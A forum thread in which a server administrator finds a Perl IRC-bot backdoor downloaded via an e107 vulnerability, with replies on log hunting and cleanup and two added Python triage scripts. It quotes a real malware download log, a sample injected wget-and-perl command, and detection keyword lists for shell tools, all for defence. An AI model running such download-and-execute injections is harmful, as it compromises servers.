Strange text in /var/log/apache2/error.log

Discussion in 'Server Operation' started by itsnedkeren, Jun 16, 2010.

  1. itsnedkeren

    itsnedkeren New Member

    Can anyone please tell me what this is:

    Code:
    --2010-06-16 23:28:21--  http://scanbot.ru/bot.txt
    Resolving scanbot.ru... 85.159.63.185
    Connecting to scanbot.ru|85.159.63.185|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 28717 (28K) [text/plain]
    Saving to: `/tmp/phpRaCehS'
    
         0K .......... .......... ........                        100% 1.13M=0.02s
    
    2010-06-16 23:28:21 (1.13 MB/s) - `/tmp/phpRaCehS' saved [28717/28717]
    
    sh: curl: command not found
    Died at /tmp/.s line 20.
    sh: curl: command not found
    
    Just saw that in my error log :( Googling it revealed nothing, really. I'm guessing some malware / exploiter, but how can I remove this, please?

    Thanks in advance for any assistance.
     
  2. matty

    matty Member

    I'd be looking very closely for that file, any other hidden or script files in /tmp, and through your access logs for requests that include things like "wget", "curl", "perl", and such.

    Basically, script kiddies try to exploit vulnerabilities in PHP etc. by causing a script (something like phpBB, Geeklog, etc.) on your server to run commands, such as downloading and running hack scripts from another site. They like to use /tmp as working space as it is often world-readable/writable, which helps them get around file system permissions.
     
  3. itsnedkeren

    itsnedkeren New Member

    Thanks for your reply, I've tried looking for that file in /tmp/ but there is nothing in there :confused:
     
  4. matty

    matty Member

    Possibly the main script was downloaded to the home directory of the website that was exploited, and it may clean up after itself to cover its tracks. Search the access logs of all your sites to find any URL request that has those commands in it. That will help you narrow down how they got in and, most likely, which web scripts you need to upgrade or report to the developers as having an exploit. Might be time to have another look over your security also, even though this attempt seems to have failed.
     
  5. itsnedkeren

    itsnedkeren New Member

    Thanks again and exactly which commands am I searching for?
     
  6. matty

    matty Member

    To be honest, it's a bit of a guess. They would use commands that can cause a file to be downloaded (curl, which was in the log you posted, or wget), and then perhaps be unpacked (tar, unzip, rar), and then executed (sh, perl, php). Just to give some examples. The timestamp of the log you posted might give you some help finding where to look in the logs, too.
     
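One way to do the log search matty describes in his two replies above, as an added example that is not code from the thread. The wget transcript in the first post landed in error.log because wget prints its progress to stderr, which a PHP script run under Apache inherits; the request that injected the command should sit in the access log of one of the sites a few seconds earlier. The script pulls the download URL, saved path, size and time out of the transcript as posted, then scans access-log lines for requests whose URL-decoded target carries one of the download/unpack/execute commands named above, optionally restricted to a window around that time. The access-log lines, hostnames and paths below are constructed for the example, not taken from the poster's server.

```python
"""Hunt Apache logs for the download-and-execute pattern in this thread.

Added example, not the thread's own commands.  Sample access-log lines,
hosts and paths are constructed; the error-log transcript is the one quoted
in the first post.
"""
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# The wget transcript quoted in the original post (error.log contents).
ERROR_LOG = """\
--2010-06-16 23:28:21--  http://scanbot.ru/bot.txt
Resolving scanbot.ru... 85.159.63.185
Connecting to scanbot.ru|85.159.63.185|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28717 (28K) [text/plain]
Saving to: `/tmp/phpRaCehS'

2010-06-16 23:28:21 (1.13 MB/s) - `/tmp/phpRaCehS' saved [28717/28717]

sh: curl: command not found
Died at /tmp/.s line 20.
"""

# Constructed Apache combined-format lines; IPs, hosts and paths are hypothetical.
ACCESS_LOG = """\
203.0.113.7 - - [16/Jun/2010:23:28:19 +0200] "GET /vuln.php?q=%3Bwget%20http%3A%2F%2Fexample.invalid%2Fbot.txt%20-O%20%2Ftmp%2Fphp.s%3Bperl%20%2Ftmp%2Fphp.s HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.4 - - [16/Jun/2010:23:28:20 +0200] "GET /index.php?page=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 208 "-" "curl/7.19"
192.0.2.10 - - [16/Jun/2010:12:00:01 +0200] "GET /blog/how-to-use-curl-and-wget.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.7 - - [16/Jun/2010:23:28:25 +0200] "POST /contact.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

WGET_URL = re.compile(r"^--(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)--\s+(\S+)")
WGET_SAVED = re.compile(r"`([^']+)' saved \[(\d+)/(\d+)\]")
ACCESS = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)')
# Download / unpack / execute commands named in the thread, followed by an
# argument.  "curl-and-wget.html" inside an ordinary path does not match.
COMMAND = re.compile(r"(?<![\w./-])(wget|curl|perl|php|sh|bash|tar|unzip|rar)\s+\S")


def parse_wget_transcript(text):
    """Return url, saved_to, size and time of every wget download in an error log."""
    found, current = [], None
    for line in text.splitlines():
        m = WGET_URL.match(line)
        if m:
            current = {"when": datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S"),
                       "url": m.group(2)}
            continue
        m = WGET_SAVED.search(line)
        if m and current is not None:
            current.update(saved_to=m.group(1), size=int(m.group(2)))
            found.append(current)
            current = None
    return found


def suspicious_requests(text, around=None, window_minutes=10):
    """Requests whose decoded target carries a shell command, optionally only
    those within +/- window_minutes of `around` (server-local wall-clock time)."""
    hits = []
    for line in text.splitlines():
        m = ACCESS.match(line)
        if not m:
            continue
        # Access and error logs both use server-local time, so compare naive values.
        when = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z").replace(tzinfo=None)
        if around is not None and abs(when - around) > timedelta(minutes=window_minutes):
            continue
        decoded = unquote(m.group("target"))  # undo %xx once, as the web server does
        commands = []
        for c in COMMAND.finditer(decoded):
            if c.group(1) not in commands:
                commands.append(c.group(1))
        if commands:
            hits.append({"ip": m.group("ip"), "when": when,
                         "request": decoded, "commands": commands})
    return hits


if __name__ == "__main__":
    for d in parse_wget_transcript(ERROR_LOG):
        print(f"{d['when']} fetched {d['url']} -> {d['saved_to']} ({d['size']} bytes)")
        for h in suspicious_requests(ACCESS_LOG, around=d["when"], window_minutes=5):
            print(f"  {h['when']} {h['ip']} ran {h['commands']}: {h['request']}")
```

Run it against the real logs by reading each site's access log into `suspicious_requests()` with `around` set to the time from `parse_wget_transcript()`; a single decode is deliberate, since a double-encoded payload is what the application would see only if it decodes again itself, and that is worth a separate pass. The regex only looks at the request target, so a User-Agent of `curl/...` is not a hit on its own.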
  7. itsnedkeren

    itsnedkeren New Member

    I'm now running 100% CPU. Some Perl script using it all :(

    3747 www-data 20 0 34088 4580 1400 R 100 0.4 157:27.73 perl
     
  8. matty

    matty Member

    I may have been hasty in saying it looked like that attempt failed. I directed you to look for the source, but don't forget to remove the payload that was saved in /tmp/phpRaCehS. Really have a close look in /tmp at what's in there. That payload file was 1.13M in size. Anyway, that bot.txt looks to be an IRC file-sharing bot. Kaspersky identifies it as Backdoor.Perl.Shellbot.a.
     
  9. itsnedkeren

    itsnedkeren New Member

    There was an empty file there, but with another name. I have deleted that, but nothing else is there.
     
  10. matty

    matty Member

    If you haven't already killed that process, you might like to try and find more about it with ps -efww. That will show the command arguments, which will hopefully show what file perl is running.

    Then, definitely kill that process. It looks like that bot is more in-depth than what I first thought (I don't read Portuguese..). Then you can start to clean up.

    http://translate.google.com.au/tran...K&prev=/search?q=sk12pack&start=10&hl=en&sa=N
     
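A way to get the same information as `ps -efww` straight from the kernel, as an added example and not something from the thread. The caveat a practitioner wants here: argv is memory the process owns, and a Perl script can assign to `$0` so that `ps` shows something harmless; `/proc/<pid>/exe`, `cwd` and `fd` are maintained by the kernel and show which binary is really running, where it sits and which files and sockets it has open. `inspect_process()` gathers those for a pid (Linux only), and `assess()` turns the result into reason codes: interpreter binary whose argv[0] claims to be something else, working directory or open file under /tmp, a deleted executable, an open socket (normal for a web worker, odd for a stray perl). The dicts in the usage note are constructed, not captured from the poster's machine.

```python
"""Triage a running process from /proc, for the 100%-CPU perl in this thread.

Added example, not the thread's own commands.  `ps -efww` prints argv, which
a Perl script can rewrite via $0; /proc/<pid>/exe, cwd and fd come from the
kernel.  inspect_process() needs Linux; assess() works on any dict with the
same keys, so it can be run on output copied from another host.
"""
import os
import re

INTERPRETERS = ("perl", "python", "php", "ruby", "sh", "bash")


def _readlink(path):
    try:
        return os.readlink(path)
    except OSError:
        return None


def inspect_process(pid):
    """Collect argv, binary, working dir and open files; None if there is no /proc."""
    base = f"/proc/{pid}"
    if not os.path.isdir(base):
        return None
    try:
        with open(f"{base}/cmdline", "rb") as f:
            argv = [a.decode(errors="replace") for a in f.read().split(b"\0") if a]
    except OSError:
        argv = []
    fds = []
    try:
        for fd in os.listdir(f"{base}/fd"):
            target = _readlink(f"{base}/fd/{fd}")
            if target:
                fds.append(target)
    except OSError:
        pass  # not our process and not root: fd listing is refused
    return {"pid": pid, "cmdline": argv, "exe": _readlink(f"{base}/exe"),
            "cwd": _readlink(f"{base}/cwd"), "fds": fds}


def inspect_self():
    """Convenience wrapper so the example can be checked on the current process."""
    return inspect_process(os.getpid())


def _program(path):
    """'/usr/bin/perl5.10.1' -> 'perl', '-bash' -> 'bash', 'apache2' -> 'apache'."""
    name = os.path.basename(path or "")
    return re.sub(r"[\d.]+$", "", name).lstrip("-")


def assess(info):
    """Return reason codes that make a process worth a closer look."""
    reasons = []
    exe = info.get("exe") or ""
    argv = info.get("cmdline") or []
    fds = info.get("fds") or []
    if exe.endswith(" (deleted)"):
        reasons.append("deleted-exe")        # binary was removed after launch
    prog = _program(exe.replace(" (deleted)", ""))
    if prog in INTERPRETERS and argv and _program(argv[0]) != prog:
        reasons.append("argv0-mismatch")     # $0 rewritten to hide the interpreter
    cwd = info.get("cwd") or ""
    if cwd == "/tmp" or cwd.startswith(("/tmp/", "/var/tmp")):
        reasons.append("tmp-cwd")
    if any(fd.startswith(("/tmp/", "/var/tmp/", "/dev/shm/")) for fd in fds):
        reasons.append("tmp-file-open")
    if any(fd.startswith("socket:") for fd in fds):
        reasons.append("has-socket")         # an IRC bot keeps one open
    return reasons


if __name__ == "__main__":
    import sys
    for arg in sys.argv[1:] or [str(os.getpid())]:
        info = inspect_process(int(arg))
        if info is None:
            print("no /proc on this system")
            break
        print(info["pid"], info["exe"], info["cmdline"], "->", assess(info) or "nothing odd")
```

Given the thread's process, `python3 triage.py 3747` (run as root or as www-data, since /proc/3747/fd is only readable by the owner) would print the real binary and arguments. A constructed dict such as `{"cmdline": ["/usr/sbin/apache2"], "exe": "/usr/bin/perl", "cwd": "/tmp", "fds": ["/tmp/.s", "socket:[4711]"]}` comes back from `assess()` with all four of argv0-mismatch, tmp-cwd, tmp-file-open and has-socket, while a perl started as `perl /home/web/cron.pl` in its own directory with only /dev/null open gets an empty list. Kill the process after you have copied the script it points at, not before, since a deleted file can be recovered from an open fd but not afterwards.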
  11. itsnedkeren

    itsnedkeren New Member

    Thanks again.

    I have killed the process, and closed off some of my sites that are not needed. CPU usage has now dropped.

    I will try and clean up later.
     
  12. esezako

    esezako New Member

    I have exactly the same problem. Any idea/solution?
     
  13. itsnedkeren

    itsnedkeren New Member

    Do you run the e107 website system? I found out that this was the culprit on my system. Some security hole in PHP code caused others to execute malicious Perl scripts on my server.
     
  14. esezako

    esezako New Member

    Yes, one of my clients has an e107 website.
    Can you tell me the file with the security hole?
     
  15. itsnedkeren

    itsnedkeren New Member

    There is more info on www.e107.org, but afaik it was the "Contact.php" file that was the problem.

    Although my problem was not like that, it still came in from e107 in some way.
     
  16. esezako

    esezako New Member

    Thanks.
    Confirm i have the same issue.
    Solved.
     
